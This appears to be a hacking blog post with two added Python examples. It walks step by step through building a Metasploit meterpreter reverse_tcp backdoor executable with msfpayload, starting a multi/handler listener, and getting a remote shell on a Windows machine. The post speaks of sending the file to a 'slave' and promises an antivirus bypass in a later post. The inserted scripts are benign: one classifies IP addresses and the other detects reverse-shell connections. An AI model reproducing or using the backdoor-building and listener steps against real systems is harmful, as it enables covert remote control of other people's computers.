Backdoor (RAT) is a powerful way to hack a system. As far as I know, we can say there are two kinds of attack: one on the LAN and one over the internet (outside our LAN network). Here we will try the first one, for educational purposes; the next one will be for outside the LAN network. If we check our IP, there are two kinds. One we can call the internal IP, which starts with something like 192.168.1.1; we can find it on Windows too, but here open a terminal and type ifconfig like this:
root@bt:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:e1:93:4a
inet addr:192.168.1.101 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2343 errors:0 dropped:0 overruns:0 frame:0
TX packets:2039 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2216117 (2.2 MB) TX bytes:480558 (480.5 KB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:95 errors:0 dropped:0 overruns:0 frame:0
TX packets:95 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:6545 (6.5 KB) TX bytes:6545 (6.5 KB)
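As an added example (not part of the original post), the following Python script pulls the interface addresses out of ifconfig output like the one above, and out of the Windows ipconfig output shown later in the post, and classifies each one as loopback, link-local, internal (RFC 1918) or external. The sample text is constructed from the post's own addresses. It makes the post's point concrete: an address in 192.168.0.0/16 is only reachable from inside the LAN, which is why the external address has to come from a service like whatsmyip.org rather than from the interface itself.

```python
import ipaddress
import re

# Constructed samples modelled on the ifconfig and ipconfig output shown
# in the post; the addresses are the ones from the post, trimmed to the
# lines that matter.
IFCONFIG_SAMPLE = """\
eth0 Link encap:Ethernet HWaddr 00:0c:29:e1:93:4a
inet addr:192.168.1.101 Bcast:192.168.1.255 Mask:255.255.255.0
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
"""

IPCONFIG_SAMPLE = """\
Wireless LAN adapter Wireless Network Connection:
Link-local IPv6 Address . . . . . : fe80::1d69:435e:2a5d:d90f
IPv4 Address. . . . . . . . . . . : 192.168.1.100
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
"""

# net-tools ifconfig prints "inet addr:A.B.C.D"; Windows ipconfig prints
# "IPv4 Address. . . : A.B.C.D". Broadcast, mask and gateway lines are
# deliberately not matched: they are not interface addresses.
ADDR_RE = re.compile(
    r"(?:inet addr:|IPv4 Address[ .]*: )(\d{1,3}(?:\.\d{1,3}){3})"
)

# The three RFC 1918 blocks: addresses here are only reachable inside
# the LAN and are what the post calls the "internal IP".
RFC1918 = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]


def extract_ipv4(text):
    """Return the IPv4 interface addresses found in ifconfig/ipconfig text."""
    return ADDR_RE.findall(text)


def classify(addr):
    """Say what kind of address this is and therefore where it is reachable."""
    ip = ipaddress.ip_address(addr)
    if ip.is_loopback:
        return "loopback"      # 127.0.0.0/8: reachable from this host only
    if ip.is_link_local:
        return "link-local"    # 169.254.0.0/16 or fe80::/10: same segment only
    if any(ip in net for net in RFC1918):
        return "internal"      # private: reachable on the LAN, not from the internet
    return "external"          # publicly routable


def summarise(text):
    """Map every interface address in the text to its classification."""
    return {addr: classify(addr) for addr in extract_ipv4(text)}


if __name__ == "__main__":
    for name, sample in (("ifconfig", IFCONFIG_SAMPLE), ("ipconfig", IPCONFIG_SAMPLE)):
        print(name, summarise(sample))
```

Run it as-is to see both samples classified; feed it the raw output of your own ifconfig or ipconfig to see which of your addresses are LAN-only.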
In the ifconfig output above, inet addr:192.168.1.101 is my internal IP. For a LAN attack we have to use the internal IP; for WAN (outside the LAN network) we have to use our external IP, which we can find out from http://whatsmyip.org. Let's create a payload. windows/meterpreter/reverse_tcp is the best one for me, but you can use another one too; to check the available payloads, follow this:
root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfpayload -l
Framework Payloads (228 total)
==============================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/x86/exec Execute an arbitrary command
bsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
bsd/x86/shell/find_tag Use an established connection, Spawn a command shell (staged)
bsd/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
bsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/x86/shell_find_port Spawn a shell on an established connection
bsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
bsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsdi/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
bsdi/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
bsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsdi/x86/shell_find_port Spawn a shell on an established connection
bsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)
cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl
cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
cmd/unix/generic Executes the supplied command
cmd/unix/interact Interacts with a shell on an established socket connection
cmd/unix/reverse Creates an interactive shell through two inbound connections
...
Read the description of each payload and use the one that fits your requirement. Here we will use windows/meterpreter/reverse_tcp to create backdoor.exe (the RAT).
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 x > /root/jeet.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.101", "LPORT"=>"4444"}
Here is the payload. We can see LHOST is our internal IP and LPORT is the port to listen on for the connection back; you can use another port if you like. The file is created in the home folder; if you want to create it on the Desktop instead, use > /root/Desktop/jeet.exe. You can change the name jeet.exe to whatever you like.
Note: jeet.exe can be detected by antivirus because it is not FUD or encoded. In the next doc I will try to explain bypassing AVs; for testing here you have to silence or disable your antivirus. Now, before opening this file, we have to start a listener on the local host first:
root@bt:~# msfconsole
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 763 exploits - 404 auxiliary - 118 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
=[ svn r14281 updated 10 days ago (2011.11.18)
Warning: This copy of the Metasploit Framework was last updated 10 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.101
lhost => 192.168.1.101
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.101:4444
[*] Starting the payload handler...
We have to use the same payload we used in the backdoor file, and the host and port must be the same too; then finally give the exploit command. If you see "Starting the payload handler...", we can now send this file to our slave. But as I said before, this attack is for the LAN, so we can test it on our own Windows system: disable the antivirus, then open jeet.exe on Windows and see what happens. After opening the file, if everything goes well, we see this:
[*] Started reverse handler on 192.168.1.101:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.100:27885) at 2011-11-28 21:32:52 +0300
meterpreter > shell
Process 4976 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
H:\ftp>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection* 15:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Wireless LAN adapter Wireless Network Connection:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::1d69:435e:2a5d:d90f
IPv4 Address. . . . . . . . . . . : 192.168.1.100
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
...
H:\ftp>
Now you can play with the Windows system. If you don't know what to do after this, then ask and I will try to write a doc on how to control the slave PC after getting a session. Hope this helps.
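From the defender's side, the session the post shows leaves a recognisable trace: a workstation opens a long-lived connection to a peer on the same LAN, on Metasploit's default port 4444, and immediately receives a 752128-byte stage. The following Python script is an added example, not from the post, that scores constructed connection records (the record fields, thresholds and function names are my assumptions) against those three signals, the way a simple rule over firewall or EDR connection logs would.

```python
import ipaddress
from dataclasses import dataclass


@dataclass
class Conn:
    """One normalised connection record (fields are my assumed schema)."""
    src: str        # host that opened the connection
    sport: int
    dst: str        # host it connected to
    dport: int
    bytes_in: int   # bytes src received
    bytes_out: int  # bytes src sent
    seconds: int    # how long the connection stayed open


# Constructed sample. The first record mirrors the session in the post:
# 192.168.1.100 calls back to 192.168.1.101:4444 and receives the
# 752128-byte stage. The rest is ordinary traffic from the same host.
SAMPLE_CONNS = [
    Conn("192.168.1.100", 27885, "192.168.1.101", 4444, 752128, 4096, 3600),
    Conn("192.168.1.100", 51000, "192.168.1.1", 53, 120, 60, 1),
    Conn("192.168.1.100", 51001, "203.0.113.10", 443, 900000, 4000, 30),
    Conn("192.168.1.100", 51002, "192.168.1.101", 445, 5000, 3000, 10),
]

DEFAULT_HANDLER_PORTS = {4444}   # Metasploit's default LPORT, used in the post
COMMON_SERVICE_PORTS = {22, 25, 53, 80, 110, 143, 443, 445, 3389}
STAGE_BYTES = 500_000            # a staged meterpreter is about 750 KB (752128 in the post)
LONG_LIVED = 600                 # seconds; an interactive shell tends to stay up
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(addr):
    """True for RFC 1918 addresses, i.e. hosts inside the LAN."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in RFC1918)


def assess(conn):
    """Return the reasons a connection looks like a reverse-shell callback."""
    reasons = []
    uncommon = conn.dport not in COMMON_SERVICE_PORTS
    if conn.dport in DEFAULT_HANDLER_PORTS:
        reasons.append("default handler port")
    if uncommon and conn.bytes_in >= STAGE_BYTES:
        reasons.append("stage-sized download on an uncommon port")
    if (uncommon and is_internal(conn.src) and is_internal(conn.dst)
            and conn.seconds >= LONG_LIVED):
        reasons.append("long-lived workstation-to-workstation connection inside the LAN")
    return reasons


def find_suspicious(conns):
    """Map (src, dst, dport) to its reasons, for connections that raised any."""
    flagged = {}
    for c in conns:
        reasons = assess(c)
        if reasons:
            flagged[(c.src, c.dst, c.dport)] = reasons
    return flagged


if __name__ == "__main__":
    for key, why in find_suspicious(SAMPLE_CONNS).items():
        print(key, "->", "; ".join(why))
```

The port rule is the weakest of the three: the post itself says any port will do, so the stage size and the long-lived peer-to-peer shape are what carry the detection. Only the first sample record is flagged; the large download on 443 and the short SMB connection to the same peer are left alone.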
Here I want to post a video I created a while back that shows the same kind of attack: http://www.youtube.com/user/jatin4u2020#p/u/14/8ymkcqslSRw
This post was written by Mr. Jeet Kumar. Join his Facebook group Real Way Hacking.